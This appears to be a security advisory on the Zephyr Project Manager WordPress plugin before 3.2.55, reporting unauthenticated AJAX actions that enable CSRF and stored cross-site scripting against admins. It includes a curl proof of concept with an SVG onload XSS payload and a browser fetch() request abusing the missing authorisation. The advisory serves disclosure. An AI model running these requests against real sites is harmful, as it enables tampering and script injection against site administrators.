Rizacan TufanWPEX-ID:82E01F95-81C2-46D8-898E-07B3B8A3F8C9Zephyr Project Manager < 3.2.55 - Unauthorised AJAX Calls To Stored XSS
5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
0.001 Low
EPSS
Percentile
21.0%
The plugin does not have any authorisation as well as CSRF in all its AJAX actions, allowing unauthenticated users to call them either directly or via CSRF attacks. Furthermore, due to the lack of sanitisation and escaping, it could also allow them to perform Stored Cross-Site Scripting attacks against logged in admins. The issue was partially fixed in 3.2.5
All AJAX actions are affected, below is an example for an unauthenticated Stored XSS by updating a Status
curl -i -s -k -X $'POST' --data-binary $'name="><svg/onload=alert(/XSS/)>&color=%23eeeeee&slug=not_started&type=status&action=zpm_update_status' \
$'https://example.com/wp-admin/admin-ajax.php'
The XSS will be triggered when an admin will view the Statuses page (/wp-admin/admin.php?page=zephyr_project_manager_categories)
v3.2.5 fixed the CSRF and XSS, however proper auth was still missing, e.g: login as a subscriber and run the below command in the dev console of the web browser
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'name=SetBySubscriber&color=%23eeeeee&slug=not_started&type=status&action=zpm_update_status&zpm_nonce=' + zpm_localized['zpm_nonce'],
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));Related
5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
0.001 Low
EPSS
Percentile
21.0%